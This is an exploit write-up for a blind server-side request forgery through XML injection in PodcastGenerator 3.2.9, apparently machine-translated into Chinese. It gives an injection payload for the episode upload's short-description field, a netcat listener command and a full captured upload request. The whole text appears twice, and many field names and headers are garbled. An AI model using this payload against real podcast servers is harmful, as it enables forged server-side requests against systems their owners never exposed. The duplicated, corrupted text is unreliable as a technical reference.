#Exploit Title: PodcastGenerator 3.2.9 -Blind SSRF通过XML注入
#Application: PodcastGenerator
#版本: v3.2.9
#BUGS:通过XML注入盲目SSRF
#Technology: PHP
#供应商url: https://podcastgenerator.net/
#software link: https://github.com/podcastgenerator/podcastGenerator
#date of stud: 01-07-2023
#作者:MirabbasAğalarov
#Tested On: Linux
2。技术细节POC
====================================================
步骤:
1。转到“上传新剧集”(http://localhost/podcastGenerator/admin/dissodes_upload.php)
2。填写所有部分和简短说明部分集作为“测试”]/shortdescpgimgpg path=''
PAYLOAD:测试]/Shortdescpgimgpg路径=''http://localhost3:3132/imgpgshortdescpg![cdata [test
顺便说一句,我使用localhost。如果您有域,则可以使用域。
3.并上传情节
4。我在港口3132上听,因为我要观察到传入的请求
NC -LVP 3132
5。我收到请求
请求:
post/podcastGenerator/admin/episodes_upload.php http/1.1
HOST: LOCALHOST
内容长度: 101563
cache-control: max-age=0
SEC-CH-UA:
sec-ch-ua-mobile:0
sec-ch-ua-platform:''
升级- 不肯定- requests: 1
Origin: http://localhost
content-type:多部分/form-data;边界=--- webkitformboundaryprutcua48pmeci6q
用户- 代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/114.0.5735.134 Safari/537.36
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.7
sec-fetch-site:相同原产
sec-fetch mode:导航
sec-fetch-user:1
sec-fetch-Dest:文档
Referer: http://localhost/podcastGenerator/admin/pissodes_upload.php
Accept-incoding: Gzip,放气
Accept-Language: en-us,en; q=0.9
cookie: phpsessid=rsvvc28on2q91ael2fiou3nad3
连接:关闭
------ webkitformboundaryprutcua48pmeci6q
content-disposition: form-data;名称='文件';文件名='2023-07-01_2023-07-07-01_2023-07-07-01_4_PHOTO-1575936123452-B67C3203203C357_1_(2).jpeg'
content-type:图像/jpeg
图像内容blaaahblahasdfjblaaah; sdfblaaahasdf
Asdfasdfaddddblaaahdblaaahddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddblaaahdddddddddblaaahdblaaahdblaaahddblaaahddblaaahdddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd dddddddd dddddddd dddddddd
------ webkitformboundaryprutcua48pmeci6q
content-disposition: form-data;名称='title'
测试
------ webkitformboundaryprutcua48pmeci6q
content-disposition: form-data;名称='shortdesc'
]]/shortdescpgimgpg路径=''http://localhost:3132/imgpgshortdescpg![cdata [test
------ webkitformboundaryprutcua48pmeci6q
content-disposition: form-data;名称='date'
2023-07-01
------ webkitformboundaryprutcua48pmeci6q
content-disposition: form-data;名称='时间'
17:02
------ webkitformboundaryprutcua48pmeci6q
content-disposition: form-data; name='Episodecover';文件名=''
content-type:应用程序/钟表流
------ webkitformboundaryprutcua48pmeci6q
content-disposition: form-data;名称='longdesc'
测试
------ webkitformboundaryprutcua48pmeci6q
content-disposition: form-data;名称='epenodenum'
33
------ webkitformboundaryprutcua48pmeci6q
content-disposition: form-data;名称='selesnnum'
33
------ webkitformboundaryprutcua48pmeci6q
content-disposition: form-data;名称='iTunesKeyWords'
------ webkitformboundaryprutcua48pmeci6q
content-disposition: form-data;名称='equallicit'
不
------ webkitformboundaryprutcua48pmeci6q
content-disposition: form-data;名称='authorname'
------ webkitformboundaryprutcua48pmeci6q
content-disposition: form-data;名称='作者邮件'
------ webkitformboundaryprutcua48pmeci6q
content-disposition: form-data; name='fustomtags'
------ webkitformboundaryprutcua48pmeci6q
content-disposition: form-data;名称='token'
VDZM0JC75ULMHV7OVXEW8DAWH5MNWSPZ
------ webkitformboundaryprutcua48pmeci6q--
#Application: PodcastGenerator
#版本: v3.2.9
#BUGS:通过XML注入盲目SSRF
#Technology: PHP
#供应商url: https://podcastgenerator.net/
#software link: https://github.com/podcastgenerator/podcastGenerator
#date of stud: 01-07-2023
#作者:MirabbasAğalarov
#Tested On: Linux
2。技术细节POC
====================================================
步骤:
1。转到“上传新剧集”(http://localhost/podcastGenerator/admin/dissodes_upload.php)
2。填写所有部分和简短说明部分集作为“测试”]/shortdescpgimgpg path=''
PAYLOAD:测试]/Shortdescpgimgpg路径=''http://localhost3:3132/imgpgshortdescpg![cdata [test
顺便说一句,我使用localhost。如果您有域,则可以使用域。
3.并上传情节
4。我在港口3132上听,因为我要观察到传入的请求
NC -LVP 3132
5。我收到请求
请求:
post/podcastGenerator/admin/episodes_upload.php http/1.1
HOST: LOCALHOST
内容长度: 101563
cache-control: max-age=0
SEC-CH-UA:
sec-ch-ua-mobile:0
sec-ch-ua-platform:''
升级- 不肯定- requests: 1
Origin: http://localhost
content-type:多部分/form-data;边界=--- webkitformboundaryprutcua48pmeci6q
用户- 代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/114.0.5735.134 Safari/537.36
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.7
sec-fetch-site:相同原产
sec-fetch mode:导航
sec-fetch-user:1
sec-fetch-Dest:文档
Referer: http://localhost/podcastGenerator/admin/pissodes_upload.php
Accept-incoding: Gzip,放气
Accept-Language: en-us,en; q=0.9
cookie: phpsessid=rsvvc28on2q91ael2fiou3nad3
连接:关闭
------ webkitformboundaryprutcua48pmeci6q
content-disposition: form-data;名称='文件';文件名='2023-07-01_2023-07-07-01_2023-07-07-01_4_PHOTO-1575936123452-B67C3203203C357_1_(2).jpeg'
content-type:图像/jpeg
图像内容blaaahblahasdfjblaaah; sdfblaaahasdf
Asdfasdfaddddblaaahdblaaahddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddblaaahdddddddddblaaahdblaaahdblaaahddblaaahddblaaahdddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd dddddddd dddddddd dddddddd
------ webkitformboundaryprutcua48pmeci6q
content-disposition: form-data;名称='title'
测试
------ webkitformboundaryprutcua48pmeci6q
content-disposition: form-data;名称='shortdesc'
]]/shortdescpgimgpg路径=''http://localhost:3132/imgpgshortdescpg![cdata [test
------ webkitformboundaryprutcua48pmeci6q
content-disposition: form-data;名称='date'
2023-07-01
------ webkitformboundaryprutcua48pmeci6q
content-disposition: form-data;名称='时间'
17:02
------ webkitformboundaryprutcua48pmeci6q
content-disposition: form-data; name='Episodecover';文件名=''
content-type:应用程序/钟表流
------ webkitformboundaryprutcua48pmeci6q
content-disposition: form-data;名称='longdesc'
测试
------ webkitformboundaryprutcua48pmeci6q
content-disposition: form-data;名称='epenodenum'
33
------ webkitformboundaryprutcua48pmeci6q
content-disposition: form-data;名称='selesnnum'
33
------ webkitformboundaryprutcua48pmeci6q
content-disposition: form-data;名称='iTunesKeyWords'
------ webkitformboundaryprutcua48pmeci6q
content-disposition: form-data;名称='equallicit'
不
------ webkitformboundaryprutcua48pmeci6q
content-disposition: form-data;名称='authorname'
------ webkitformboundaryprutcua48pmeci6q
content-disposition: form-data;名称='作者邮件'
------ webkitformboundaryprutcua48pmeci6q
content-disposition: form-data; name='fustomtags'
------ webkitformboundaryprutcua48pmeci6q
content-disposition: form-data;名称='token'
VDZM0JC75ULMHV7OVXEW8DAWH5MNWSPZ
------ webkitformboundaryprutcua48pmeci6q--